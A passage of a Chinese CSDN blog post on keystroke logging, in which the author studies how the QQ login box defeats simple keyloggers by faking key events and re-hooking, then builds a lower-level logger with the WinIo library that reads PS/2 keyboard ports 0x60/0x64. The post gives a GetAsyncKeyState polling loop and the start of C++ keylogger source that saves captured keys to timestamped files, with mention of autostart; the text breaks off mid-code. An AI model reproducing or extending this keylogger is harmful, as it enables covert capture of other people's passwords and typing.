使用WINIO进行驱动层的键盘记录

最新推荐文章于 2018-08-10 11:53:14 发布

ainn_pp

最新推荐文章于 2018-08-10 11:53:14 发布

阅读量3.7k

点赞数

本文链接：https://blog.csdn.net/ainn_pp/article/details/8990210

版权

本文探讨了QQ如何防止键盘记录，通过实验发现QQ密码框伪造按键事件以避免被记录。作者进一步研究了底层键盘监控，利用WINIO直接读取键盘中断，涉及PS2键盘芯片的工作原理，并编写了一个简单的程序进行实时监控。最后，讨论了如何实现开机启动以及对USB键盘监控的疑问。

摘要由CSDN通过智能技术生成

突然对QQ的安全机制起了兴趣..

想来利用检测键盘状态来做键盘记录应该很容易.安全软件也不能认为这种需求为非法.那QQ怎么防类似记录呢.

做个实验.

随便写个程序,每帧都去读取键盘状态.行不行?

	for(int i = 8; i <=255; i++)
	{
		if( GetAsyncKeyState(i) & 1 == 1 )
		{
			cout << i;
		}
	}

很容易取得键盘状态,每帧之间sleep上5微秒.CPU也不会高也不会漏掉.

这样做的话,在使用记事本或其他应用的时候都是可以记录的.但当QQ登录框的密码项激活时,我发现即使没有按键盘,也会不断有检测到键盘按键被按下..

也就是说QQ的密码框在不断的伪造按键事件..

嗯,这个方法挺巧妙的.我实验了一下招商银行的安全控件.没有类似的伪造行为.

这么看QQ和安全控件的原理应该一样,HOOK掉键盘事件.隐藏或伪造真实事件.

WINDOWS的机制是后HOOK的钩子先被通知,那如果我们也HOOK掉相同的事件呢?

百度一下..发现有人研究过.QQ有个定时器,隔段时间会重新UNHOOK,HOOK一次.哈哈.这个机制确实巧妙.不禁的要赞一下.

那再底层有没有办法监控呢?.试试用WINIO直接读取键盘中断的方法.这个设计到很多硬件知识.实在是不懂,搜了一圈知道以下原理:

PS2的键盘芯片.会在有键盘按下时改变端口64的标志位.这时候去读取端口60的值,就能得到当前按下的键盘按键的扫描码.

数据一旦被读走,状态寄存器就会清0.所以这里必须不停的监控.CPU占用会较高.

于是写了如下程序.每次启动时生成一个以当前时间命名的文件,不停监控键盘事件,如果10秒内没有键盘敲击,则将之前的数据写入文件.在WIN7,XP下运行通过.

// KeyBoardRecord.cpp : Defines the entry point for the console application.
//

#include <windows.h>
#include <Winuser.h>
#include <string>
#include <fstream>
#include <iostream>

#include <time.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/timeb.h>
#include <assert.h>

#include <..\WinIo\Source\Dll\winio.h>

#pragma comment( lib, "..\\WinIo_v2\\Source\\Dll\\Release\\WinIo.lib" )

using namespace std;


string GetKey(int Key) // 判断键盘按下什么键
{
	string KeyString = "";
	//判断符号输入
	const int KeyPressMask=0x80000000; //键盘掩码常量
	int iShift=GetKeyState(0x10); //判断Shift键状态
	bool IS=(iShift & KeyPressMask)==KeyPressMask; //表示按下Shift键
	if(Key >=186 && Key <=222)
	{
		switch(Key)
		{
		case 186:
			if(IS)
				KeyString = ":";
			else
				KeyString = ";";
			break;
		case 187:
			if(IS)
				KeyString